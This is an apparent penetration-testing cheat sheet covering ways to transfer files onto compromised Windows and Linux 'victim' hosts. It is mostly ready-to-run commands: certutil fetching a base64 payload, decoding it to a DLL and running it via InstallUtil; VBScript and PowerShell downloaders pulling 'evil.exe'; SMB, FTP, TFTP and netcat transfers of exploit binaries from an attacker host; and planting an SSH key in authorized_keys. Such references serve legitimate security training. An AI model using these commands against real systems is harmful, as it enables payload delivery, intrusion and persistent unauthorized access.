# Downloading/Transfer files ## Simple Local Web Servers | Command | Description | | -------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | | python -m SimpleHTTPServer 80 | Run a basic http server, great for serving up shells etc | | python3 -m http.server | Run a basic Python3 http server, great for serving up shells etc | |

ruby -rwebrick -e "WEBrick::HTTPServer.new

(:Port => 80, :DocumentRoot => Dir.pwd).start"

| Run a ruby webrick basic http server | | php -S 0.0.0.0:80 | Run a basic PHP http server | ## Updog Link: [https://github.com/sc0tfree/updog ](https://github.com/sc0tfree/updog) Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth. Install using pip: `pip3 install updog` ### Usage `updog [-d DIRECTORY] [-p PORT] [--password PASSWORD] [--ssl]` ## SMTP Server Link: Usage: `go run simplesmtp.go -save -i 0.0.0.0 -p 25` ## Windows ### curl Since Win10 1809 there is a build in curl ``` C:\Users\IEUser>curl.exe curl: try 'curl --help' for more information C:\Users\IEUser>curl.exe google.com/robots.txt 301 Moved Permanently

Moved Permanently

The document has moved here.

C:\Users\IEUser> ``` ### wget Wget is alias to Invoke-WebRequest in powershell ``` PS C:\Users\Idan> wget google.com/robots.txt StatusCode : 200 StatusDescription : OK Content : User-agent: * Disallow: /search Allow: /search/about Allow: /search/static Allow: /search/howsearchworks Disallow: /sdch Disallow: /groups Disallow: /index.html? Disallow: /? Allow: /?hl= Disallow: /?... RawContent : HTTP/1.1 200 OK Vary: Accept-Encoding X-Content-Type-Options: nosniff X-XSS-Protection: 0 Alt-Svc: quic=":443"; ma=2592000; v="46,43",h3-Q050=":443"; ma=2592000,h3-Q049=":443"; ma=2592000,h3-Q048=... Forms : {} Headers : {[Vary, Accept-Encoding], [X-Content-Type-Options, nosniff], [X-XSS-Protection, 0], [Alt-Svc, quic=":443"; ma=2592000; v="46,43",h3-Q050=":443"; ma=2592000,h3-Q049=":443"; ma=2592000,h3-Q048=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,h3-T050=":443"; ma=2592000]...} Images : {} InputFields : {} Links : {} ParsedHtml : mshtml.HTMLDocumentClass RawContentLength : 7004 ``` View just content: ``` Invoke-WebRequest 'http://google.com/robots.txt' | Select-Object -Expand Content ``` ### PS iwr alias to Invoke-WebRequest `iwr google.com/robots.txt` ### bitsadmin Use bitsadmin to download via the command line on older version of windows (works from CMD.exe) usage: `cmd.exe /c bitsadmin /transfer {JOB NAME} /download /priority normal {LINK} {DOWNLOAD LOCATION}` example: ``` bitsadmin /transfer debjob /download /priority normal http://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-8.7.1-i386-xfce-desktop.iso D:\Users\[Username]\Downloads\debian-live-8.7.1-i386-xfce-desktop.iso ``` credit: ### PS WebClient ``` (new-object System.Net.WebClient).DownloadFile('http://www.xyz.net/file.txt','C:\tmp\file.txt') ``` ### Certutil You can download the file directly: ```csharp certutil.exe -urlcache -f http://192.168.0.1/file.exe file.exe ``` Or you can encode the file in base64 and then use `certutil` to decode it. ``` certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll ``` ### FTP On a linux host start a FTP: ``` apt-get install python3-pyftpdlib python3 -m pyftpdlib -p 21 -w ``` Or use metasploit: ``` msf > use auxiliary/server/ftp ``` Write to the file the commands on the victim: ``` echo open 192.168.1.101 21> ftp.txt echo USER N7WERA>> ftp.txt echo NEWERA_PASSWORD>> ftp.txt echo bin>> ftp.txt echo GET winpease.exe>> ftp.txt echo bye>> ftp.txt ``` run from cmd or powershell: `ftp -s ftp.txt` ### SMB Server Start smb server on Kali (or any linux) using impacket: ``` root@kali# smbserver.py -smb2support {SHARE NAME} {FOLDER TO SHARE} -username newera -password newera ``` From the victim: ``` C:\>net use \\10.11.0.XXX\smb /user: The command completed successfully. ``` Copy files: ``` C:\WINDOWS\Temp>copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe 1 file(s) copied. ``` ### TFTP Server Start TFTP on Kali: ``` service atftpd start atftpd --daemon --port 69 /tftp ``` Download files from the victim: ``` tftp -i 192.168.0.1 GET winpeas.txt ``` ### VBScript Here is a good script to make a wget-clone in VB. If it doesn't work try piping it through unix2dos before copying it. ``` echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs ``` You then execute the script like this: ``` cscript wget.vbs http://192.168.10.5/evil.exe evil.exe ``` ### NC.exe You can download a standalone compiled version of NC (Netcat) for windows from the nmap project (), or use the kali compiled version, located in: `/usr/share/windows-binaries/nc.exe` If you're able to move the ncat to the victim you can use the normal nc functions to transfer more files (or gain a shell..) On the attacker host: ``` nc 192.168.0.10 4444 < file.exe ``` On the victim: ``` ncat.exe -lvp 4444 > file.exe ``` ## Linux ### scp A built in SSH utility to trasfer files. once you gained access to the victim you can add a your pulic key to `.ssh/authorized_keys` or use credentials if found Using public/private key - once a public key was copied to the victim .ssh folder, you can transfer files from the attacker to the victim by running: `scp file.exe -i id_rsa user@victim:/tmp/` The file will be transferred to the `/tmp` folder. If you gained crednetials remove the `-i id_rsa` and login with the same command as above. ### wget wget is used to download files to the victim, run a web sever on the attacker by running: ``` python3 -m http.server ``` and download from the victim: ``` wget 192.168.0.1:8080/linenum.sh ``` ### curl Curl is used to view web server source code, we can download files by running ``` curl https://url -o output.file.name ``` ### ftp linux has a build in ftp utility, first created a listerner on the attacker host: ``` apt-get install python-pyftpdlib python -m pyftpdlib -p 21 -w ``` Or use metasploit: ``` msf > use auxiliary/server/ftp ``` and then connect from the victim using ``` ftp 192.168.0.1 ``` ### nc A lot of unix systems have a build in nc utility which can be used to transfer files, same way as in windows. You can download a compiled version of nc to unix from: